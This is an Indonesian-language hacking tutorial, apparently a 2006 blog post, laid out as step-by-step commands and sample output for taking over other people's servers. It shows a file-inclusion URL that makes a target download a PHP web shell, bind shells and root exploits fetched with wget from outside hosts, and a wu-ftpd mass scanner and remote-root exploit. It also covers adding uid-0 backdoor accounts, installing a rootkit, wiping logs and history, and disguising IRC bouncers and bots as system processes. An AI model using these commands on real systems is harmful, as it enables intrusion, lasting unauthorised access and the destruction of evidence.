-*- pasang backd00R -*-
-*-------------------*-
=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php
bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita
kalo bisa... buka:
http://www.target.org/modules/My_eGallery/public/log.php
==============
pasang bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port
4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload
source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile
dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell
### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`
## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`
## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029
-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-
### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya :p
### atau bisa ambil exploit di www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+
-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash
cd .bash <--- untuk masuk ke direktori bash
mkdir
cd
cd / <--- untuk keluar dari suatu direktory
rm -rf
-*-----------------------------------------------*-
1. Tahap Pertama :
Cara instalasi Xpost dan ftp
wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz
-*------*-
2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut
Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...
Itu berarti anda telah dapat akses root di IP 213.124.151.113
-*------*-
3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda
masuk ke direktory ftp anda
cd ftp
./awu 213.124.151.113 ( ip nya)
apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
###################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
whoami
root <-- berarti anda sedang dalam akses root
-*------*-
4. Tahap Keempat
Add login akses root anda
----------------------------------------------------------------
1. Cara I
(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /
passwd -d rampok
passwd rampok
su rampok <<--------untuk super user
2. Cara II
kalo mau dapet acces root ketik :
/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit
wuasu666
Kemudian Add User untuk login shell anda
/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X
-*------*-
5. Tahap Kelima
Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan
wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau
contoh : --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
-*------*-
6. Tahap Keenam
Hapus jejak ngeroot anda ketik perintah berikut:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d
SELESAI.....
---------------------------------------------------------------------------------
-*-----------------*-
-*- all IN one -*-
-*-----------------*-
Trik membuat PsyBnc, Menghapus file Log, membuat BACK DOOR , ..... << lengkapnya >>
---------------------------------------------------------------------------------
-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc Yang aman :P~ --*-
-*------------------------------------------*-
mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut
cd "...." <<-- masuk ke direktori
wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh
mv psybnc .log
cd .log
make
echo "PSYBNC.SYSTEM.PORT1=110" >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf " "
"[identd] " " "
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 11111
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
[scut@d11303 .log]$
ps -x untuk mengetahui proses di background shell
[scut@d11303 .log]$ ps -x
PID TTY STAT TIME COMMAND
31544 ? S 0:16 ./bash
31629 ? S 0:06 sendmail to scut
2212 pts/1 S 0:00 -bash
2291 pts/1 S 0:00 [identd]
2309 pts/1 R 0:00 ps -x
catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background
psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan:
find | grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid
Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud
Dengan cara tersebut kemungkinan sang admin nggak akan curiga terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik :) selamat mencoba
-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc II --*-
-*------------------------------------------*-
wget http://www.geocities.com/g4ptek/tools/psy.tar.gz
tar -zxvf psy.tar.gz
rm -rf psy.tar.gz
cd .cgi;
./config 21221;-----------> port ubah sesuai keinginan
./fuck;./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:ssstt
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 21221
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
# usage:
# buka mirc, setting identd bebas, nick bebas
ketik /server www.target.com 21221
-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc II Freebsd --*-
-*------------------------------------------*-
# wget http://www.geocities.com/g4ptek/tools/bnc.tar.gz
# tar -zxvf bnc.tar.gz
# rm -rf bnc.tar.gz
# cd .ls
# chmod 755 ls
# ./ls
-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT I -*-
-*-----------------------------------*-
NB: BOT Ini akan otomatis jalan pada server dalnet " Husus Untuk dalnet server "
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl
2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz
tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2
3. cd .kin
4. ./creat fileconf nick ident IP channel owner
contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek
defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya)
s4nd4l_j3p1t ...............nick bot
s4nd4l ...................ident bot
212.88.174.3 .......IP shell
g4ptek ................ nick owner
catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)
contoh: mich`keren -> mich\`keren
5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat
contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl
2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel
-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT II -*-
-*-----------------------------------*-
wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth
Selamat BikiN Bot....
rewritten on barata jaya SBY, February 6th 2006 by g4ptek
Tidak ada komentar:
Posting Komentar